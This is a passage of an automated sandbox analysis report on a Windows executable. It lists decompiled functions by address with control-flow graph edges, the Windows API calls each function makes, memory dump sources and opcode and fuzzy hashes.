                                                                                                                                                                                                                                                              control_flow_graph 579 408d43-408d4a 580 408d50-408d9a 579->580 581 4090fc-409123 579->581 582 408dbc 580->582 583 408d9c-408dba 580->583 584 409709-40971c 581->584 585 408dc6-408dcd 582->585 583->585 586 40973d-409755 584->586 587 40971e-40973b 584->587 588 408dd3-408e00 585->588 589 408fe5 585->589 590 409758-40975e 586->590 587->590 591 408e06-408e45 588->591 594 408fef-409018 589->594 592 409760-409766 590->592 593 40976b-409772 590->593 595 408e72-408e97 591->595 596 408e47-408e70 591->596 603 409b06 592->603 604 408a9f 592->604 597 4099a6-4099ab 593->597 598 409778-4097a4 593->598 600 40901a-40902d 594->600 601 40902f-409047 594->601 602 408e9d-408ea3 595->602 596->602 605 4099b2-409b04 597->605 598->592 606 40904d-409053 600->606 601->606 611 408ee2-408eee 602->611 612 408ea5-408eac 602->612 613 409b09-409b10 603->613 607 408cf5-408cfb 604->607 608 408aa6-408aad 604->608 609 408be7-408bed 604->609 610 408ce7-408cee 604->610 605->613 614 409055-40905c 606->614 615 40908e-409098 606->615 626 408d07-408d3e 607->626 608->605 617 408ab3-408ad1 608->617 616 408bf4-408c01 609->616 620 408cf0 610->620 621 408cab-408cd9 610->621 622 408ef4-408efe 611->622 623 408fae-408fb8 611->623 618 409962-409967 612->618 619 408eb2-408edc 612->619 624 409970-409975 614->624 625 409062-409088 614->625 615->594 627 40909e-4090a4 615->627 629 409954-409959 616->629 630 408c07-408c2c 616->630 617->603 634 408ad7-408b42 617->634 618->605 619->611 635 40995b-409960 620->635 631 408cdb-408ce1 621->631 632 408cfd 621->632 636 408f04-408f2d 622->636 637 408fca-408fe0 622->637 623->591 633 408fbe-408fc4 623->633 624->605 625->615 626->584 628 4090aa-4090b1 627->628 638 409977-40997c 628->638 639 4090b7-4096f4 628->639 629->605 629->635 630->616 640 408c2e-408c3a 630->640 631->610 632->626 633->637 641 408b44-408b4b 634->641 642 408b96-408ba9 634->642 635->605 643 408f8c-408fac 636->643 644 408f2f-408f3f 636->644 637->628 638->605 639->604 648 408c88-408ca9 640->648 649 408c3c-408c43 640->649 650 408b69-408b90 GlobalAlloc 641->650 651 408b4d-408b63 GlobalFree 641->651 645 408baf-408bb4 642->645 646 408f42-408f48 643->646 644->646 652 408bc1-408be1 645->652 653 408bb6-408bbf 645->653 646->622 654 408f4a-408f51 646->654 648->631 655 408c55-408c76 GlobalAlloc 649->655 656 408c45-408c54 GlobalFree 649->656 650->603 650->642 651->650 652->609 653->645 657 408f57-408f87 654->657 658 409969-40996e 654->658 655->603 659 408c7c-408c82 655->659 656->655 657->622 658->605 659->648
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3394109436-0
                                                                                                                                                                                                                                                              • Opcode ID: cd7b7cc6089db85a917c869ea418fe9b4336126d354651c2af7450458f0d2819
                                                                                                                                                                                                                                                              • Instruction ID: 73a589aadd6280c1d4df6f0517975a2c4eda39665482ce8a8b3e558a14f083aa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd7b7cc6089db85a917c869ea418fe9b4336126d354651c2af7450458f0d2819
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD32CF75E04269CFEB64CF28C940BA9BBB2BB48300F1581EAD889B7381D7745E85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004093BF Relevance: 5.4, APIs: 4, Instructions: 399COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 660 4093bf-4093c6 661 409632 660->661 662 4093cc-409404 660->662 663 409638-409646 661->663 664 409436-40944f 662->664 665 409406-409431 662->665 671 409993-40999d 663->671 672 40964c-409658 663->672 668 409457-40945e 664->668 667 4094fb-409519 665->667 673 409527-409533 667->673 669 409460-409474 668->669 670 4094ca-4094f5 668->670 674 409483-409489 669->674 675 409476-40947c 669->675 670->667 680 4099b2-409b04 671->680 676 409b06 672->676 677 40965e-40966b 672->677 678 409624-409630 673->678 679 409539-409569 673->679 681 409451 674->681 682 40948b-409492 674->682 675->674 686 409b09-409b10 676->686 683 409671-409678 677->683 678->663 684 4095da-40961f 679->684 685 40956b-409588 679->685 680->686 681->668 687 409985-40998a 682->687 688 409498-4094c8 682->688 689 40967e-4096ed 683->689 690 40999f-4099a4 683->690 691 40958e-409594 684->691 685->691 687->680 688->681 689->683 692 4096ef-4096f4 689->692 690->680 693 409596-40959d 691->693 694 40951b-409521 691->694 695 408a9f 692->695 696 4095a3-4095d5 693->696 697 40998c-409991 693->697 694->673 698 408cf5-408cfb 695->698 699 408aa6-408aad 695->699 700 408be7-408bed 695->700 701 408ce7-408cee 695->701 696->694 697->680 706 408d07-40971c 698->706 699->680 703 408ab3-408ad1 699->703 702 408bf4-408c01 700->702 704 408cf0 701->704 705 408cab-408cd9 701->705 708 409954-409959 702->708 709 408c07-408c2c 702->709 703->676 712 408ad7-408b42 703->712 713 40995b-409960 704->713 710 408cdb-408ce1 705->710 711 408cfd 705->711 714 40973d-409755 706->714 715 40971e-40973b 706->715 708->680 708->713 709->702 716 408c2e-408c3a 709->716 710->701 711->706 717 408b44-408b4b 712->717 718 408b96-408ba9 712->718 713->680 720 409758-40975e 714->720 715->720 721 408c88-408ca9 716->721 722 408c3c-408c43 716->722 723 408b69-408b90 GlobalAlloc 717->723 724 408b4d-408b63 GlobalFree 717->724 719 408baf-408bb4 718->719 725 408bc1-408be1 719->725 726 408bb6-408bbf 719->726 727 409760-409766 720->727 728 40976b-409772 720->728 721->710 729 408c55-408c76 GlobalAlloc 722->729 730 408c45-408c54 GlobalFree 722->730 723->676 723->718 724->723 725->700 726->719 727->676 727->695 731 4099a6-4099ab 728->731 732 409778-4097a4 728->732 729->676 734 408c7c-408c82 729->734 730->729 731->680 732->727 734->721
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 96471980e818e90389b8f28b0725736ff68ec6d8f08f1ae4e00d8e9b25cb3d10
                                                                                                                                                                                                                                                              • Instruction ID: 2ff6cda69edbaac919d86c53bc6808f5f303a55c6bc0211467f0ef21a37139c8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96471980e818e90389b8f28b0725736ff68ec6d8f08f1ae4e00d8e9b25cb3d10
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7229B74E05269CBEB64CF18C980BA9BBB2BB48300F1482EAD84DB7381D7345E85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040893D Relevance: 5.4, APIs: 4, Instructions: 351memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 735 40893d-408965 736 409b09-409b10 735->736 737 40896b-408a94 735->737 738 408a96-408a99 737->738 739 409b06 738->739 740 408a9f 738->740 739->736 741 408cf5-408cfb 740->741 742 408aa6-408aad 740->742 743 408be7-408bed 740->743 744 408ce7-408cee 740->744 750 408d07-40971c 741->750 746 4099b2-409b04 742->746 747 408ab3-408ad1 742->747 745 408bf4-408c01 743->745 748 408cf0 744->748 749 408cab-408cd9 744->749 752 409954-409959 745->752 753 408c07-408c2c 745->753 746->736 747->739 756 408ad7-408b42 747->756 757 40995b-409960 748->757 754 408cdb-408ce1 749->754 755 408cfd 749->755 758 40973d-409755 750->758 759 40971e-40973b 750->759 752->746 752->757 753->745 760 408c2e-408c3a 753->760 754->744 755->750 761 408b44-408b4b 756->761 762 408b96-408ba9 756->762 757->746 764 409758-40975e 758->764 759->764 765 408c88-408ca9 760->765 766 408c3c-408c43 760->766 767 408b69-408b90 GlobalAlloc 761->767 768 408b4d-408b63 GlobalFree 761->768 763 408baf-408bb4 762->763 769 408bc1-408be1 763->769 770 408bb6-408bbf 763->770 771 409760-409766 764->771 772 40976b-409772 764->772 765->754 773 408c55-408c76 GlobalAlloc 766->773 774 408c45-408c54 GlobalFree 766->774 767->739 767->762 768->767 769->743 770->763 771->738 775 4099a6-4099ab 772->775 776 409778-4097a4 772->776 773->739 777 408c7c-408c82 773->777 774->773 775->746 776->771 777->765
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3394109436-0
                                                                                                                                                                                                                                                              • Opcode ID: 40efa2268de9016f5e6645c0c9238ed231c7493705202486a25610001e8f553c
                                                                                                                                                                                                                                                              • Instruction ID: 196290a36a957acb70ae20b533fcf0c155bb910872d15f7e614b6225c37c67e6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40efa2268de9016f5e6645c0c9238ed231c7493705202486a25610001e8f553c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05026CB4D05268CFDBA4CF68C980B99BBF1BB48300F1082EAD959A7342D7349E85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401860 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00407935: CharNextA.USER32(?,00000000,75923160,?,00408184,?,?,?,00000000,?,004085CF), ref: 0040794A
                                                                                                                                                                                                                                                                • Part of subcall function 00407935: CharNextA.USER32(75923160,?,00408184,?,?,?,00000000,?,004085CF), ref: 00407952
                                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(00000000,00000000), ref: 00401930
                                                                                                                                                                                                                                                                • Part of subcall function 004078A4: CharNextA.USER32 ref: 004078BE
                                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32 ref: 004018E0
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CharNext$AttributesCurrentDirectoryFile
                                                                                                                                                                                                                                                              • String ID: \
                                                                                                                                                                                                                                                              • API String ID: 15404496-2967466578
                                                                                                                                                                                                                                                              • Opcode ID: d78038b2043e385ee061b609f29dc6a012e38869a8f0274da12750c867810de6
                                                                                                                                                                                                                                                              • Instruction ID: b3c069ff8fe5fca2169c100ba5b4309268a8952e4838bd2cd3cdfa24001796cc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d78038b2043e385ee061b609f29dc6a012e38869a8f0274da12750c867810de6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E22196B19087419ED7107F2A8C4476ABBE8AF41314F15897FE4D5A33E1D63D4581CB2B
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00403845 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                                                              • String ID: 0u
                                                                                                                                                                                                                                                              • API String ID: 3850602802-3203441087
                                                                                                                                                                                                                                                              • Opcode ID: 0f8c1266bbb926ccc1bd59e027622b1526ca312be5caf6883b3757b9e2fe7e12
                                                                                                                                                                                                                                                              • Instruction ID: 587040a18b5e8d3ddabbac84dae9583a5ca4581ff6aa0f06bd791ecb2da4f76d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f8c1266bbb926ccc1bd59e027622b1526ca312be5caf6883b3757b9e2fe7e12
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2811B172A043009FC710BF29D88911BBFE8EB40351F50C67EF854A73A0E338D6058B99
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00407AD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                              • String ID: nsa
                                                                                                                                                                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                              • Opcode ID: b0a3207c486979766b199e0870a403b1f3979b7e2f67fc1e41fde7ae102ddd2e
                                                                                                                                                                                                                                                              • Instruction ID: 856d399887dd27b7ff2090b6ba205bffd5fa5b63c1769944cd833ed7d7811f75
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0a3207c486979766b199e0870a403b1f3979b7e2f67fc1e41fde7ae102ddd2e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CF0C272E082049FCB10AF69D88879FBFB4EF84310F00843AE95497380D6749515CB97
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004097A6 Relevance: 5.3, APIs: 4, Instructions: 284COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: a578235fd7ef3aed2a2d552e65bc1af2bfd9bf356f91058c6dae311955d0e3a7
                                                                                                                                                                                                                                                              • Instruction ID: 373024fc2fed516bdc636a623b7a3c01618f37309bfd328d060bf71c45cb50f6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a578235fd7ef3aed2a2d552e65bc1af2bfd9bf356f91058c6dae311955d0e3a7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2FE18A75E05269CFEB64CF68C980B99BBB1BB48300F1081EAD84DA7381D774AE85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00409302 Relevance: 5.3, APIs: 4, Instructions: 276COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 1580e02ebf7c4fca29966eb1b7433a0a3187ed73c579ff4eb24ab240cbf4b120
                                                                                                                                                                                                                                                              • Instruction ID: a08f90893e9a4040dbcaa68aabc4f5c37fecb49a8b953bcbec771c1c1b16f75e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1580e02ebf7c4fca29966eb1b7433a0a3187ed73c579ff4eb24ab240cbf4b120
